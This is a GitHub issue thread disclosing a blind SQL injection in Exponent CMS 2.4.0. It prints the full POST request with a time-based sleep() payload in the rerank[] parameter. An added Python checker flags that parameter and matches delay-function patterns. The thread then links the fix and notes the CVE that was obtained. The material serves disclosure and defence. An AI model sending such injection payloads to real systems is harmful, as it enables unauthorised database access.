exponentcms / exponent-cms

Content Management, Simple.
exponentcms.org
GNU General Public License v2.0

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4) #1437

Closed exponentcms closed 4 years ago

exponentcms commented 4 years ago

```
POST /exponent/ HTTP/1.1
Content-Length: 268
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=4b42cc8b7f69ebe1afdcbf4abbfee00b; adminer_key=cdeaea5d52a8f402a28bd04980a7851b
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /

action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/untitled&model=container&rerank%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&src=%40section1
```
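A request-body check for the `rerank[]` parameter shown in the report above, as an added example that is not part of the original issue or of Exponent CMS itself. It assumes `rerank[]` entries are meant to be numeric record ids; `check_rerank`, the patterns and the benign body are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Form body of the request reported in this issue (copied from the page).
REPORTED_BODY = (
    "action=manage_ranks&controller=container"
    "&lastpage=http://192.168.118.1/exponent/untitled&model=container"
    "&rerank%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()"
    "%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/"
    "&src=%40section1"
)
# Constructed benign request for comparison (ids are made up).
BENIGN_BODY = (
    "action=manage_ranks&controller=container"
    "&rerank%5b%5d=12&rerank%5b%5d=7&src=%40section1"
)

# Assumption: every rerank[] entry is a numeric record id.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")
# Time-delay calls that mark a value as a time-based blind SQLi probe.
DELAY_CALL = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)


def check_rerank(body: str) -> list[dict]:
    """Return one finding per rerank[] value that is not a plain numeric id."""
    findings = []
    # parse_qsl percent-decodes names and values, so "rerank%5b%5d" -> "rerank[]".
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name != "rerank[]" or NUMERIC_ID.fullmatch(value):
            continue
        reason = (
            "time-delay SQL function"
            if DELAY_CALL.search(value)
            else "non-numeric value"
        )
        # Truncate the stored value so log entries stay short.
        findings.append({"param": name, "reason": reason, "value": value[:60]})
    return findings


if __name__ == "__main__":
    for label, body in (("reported", REPORTED_BODY), ("benign", BENIGN_BODY)):
        print(label, check_rerank(body))
```

The allow-list match on the decoded value is what rejects the request; the delay-function pattern only classifies the finding for triage.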

exponentcms commented 4 years ago

Appears to be a duplicate of #1395

exponentcms commented 4 years ago

(from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c603931b785a4c3ec69cfd06181ba

exponentcms commented 4 years ago

Hi, can you help me to apply for a CVE ID for this vulnerability?

exponentcms commented 4 years ago

Please visit http://cve.mitre.org/cve/request_id.html. I've not had much success since they've changed reporting methods from email submission to form submission.

exponentcms commented 4 years ago

Hi, I have successfully applied for a CVE ID (CVE-2016-9272) for this SQL injection vulnerability.

Credit: Nicky of Tencent Security Platform Department

Thank you.

exponentcms commented 4 years ago

Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1394